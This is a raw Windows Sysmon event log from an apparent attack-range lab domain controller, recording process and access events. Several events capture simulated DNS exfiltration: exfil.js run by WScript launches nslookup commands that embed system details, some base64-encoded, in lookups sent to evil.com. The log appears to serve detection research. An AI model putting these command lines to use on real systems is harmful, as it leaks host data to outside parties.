14:16:25.903{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198740Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.903{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198739Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.903{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198738Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.903{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B9-629A-C53F-000000005F02}4996C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198737Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.903{2E1864BB-17B9-629A-C33F-000000005F02}80766424C:\Windows\system32\cmd.exe{2E1864BB-17B9-629A-C53F-000000005F02}4996C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198736Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.908{2E1864BB-17B9-629A-C53F-000000005F02}4996C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B9-629A-C33F-000000005F02}8076C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyzexh.tmp 2>&1 10341000x8000000000000000198735Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.882{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B9-629A-C43F-000000005F02}5048C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198734Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.882{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B9-629A-C43F-000000005F02}5048C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198733Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.882{2E1864BB-17B9-629A-C43F-000000005F02}50487604C:\Windows\system32\conhost.exe{2E1864BB-17B9-629A-C33F-000000005F02}8076C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198732Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.866{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B9-629A-C43F-000000005F02}5048C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198731Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.866{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B9-629A-C33F-000000005F02}8076C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198730Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.866{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198729Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.850{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198728Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.850{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198727Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.850{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198726Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.850{2E1864BB-17A1-629A-783D-000000005F02}55527080C:\Windows\System32\WScript.exe{2E1864BB-17B9-629A-C33F-000000005F02}8076C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198725Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.864{2E1864BB-17B9-629A-C33F-000000005F02}8076C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyzexh.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000198724Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.850{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlkxja.tmpMD5=56DBCEFC15EB1306F8CE602736A8089D,SHA256=D5DF994C5494FA571A4E37094E6011B6EAA7240C900C90D4E5CDDC8058C5BBCD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000198723Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.819{2E1864BB-17B9-629A-C13F-000000005F02}77325332C:\Windows\system32\conhost.exe{2E1864BB-17B9-629A-C23F-000000005F02}7024C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000198722Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:23.393{00000000-0000-0000-0000-000000000000}6560<unknown process>-udptruefalse127.0.0.1-52526-false127.0.0.1-53domain 10341000x8000000000000000198721Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.803{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198720Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.803{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198719Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.803{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198718Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.803{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198717Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.803{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B9-629A-C23F-000000005F02}7024C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198716Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.803{2E1864BB-17B9-629A-C03F-000000005F02}26925976C:\Windows\system32\cmd.exe{2E1864BB-17B9-629A-C23F-000000005F02}7024C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198715Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.814{2E1864BB-17B9-629A-C23F-000000005F02}7024C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 33983848448 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B9-629A-C03F-000000005F02}2692C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 33983848448 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkxja.tmp 2>&1 10341000x8000000000000000198714Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.781{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B9-629A-C13F-000000005F02}7732C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198713Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.781{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B9-629A-C13F-000000005F02}7732C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198712Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.781{2E1864BB-17B9-629A-C13F-000000005F02}77325332C:\Windows\system32\conhost.exe{2E1864BB-17B9-629A-C03F-000000005F02}2692C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198711Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.765{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B9-629A-C13F-000000005F02}7732C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198710Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.765{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198709Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 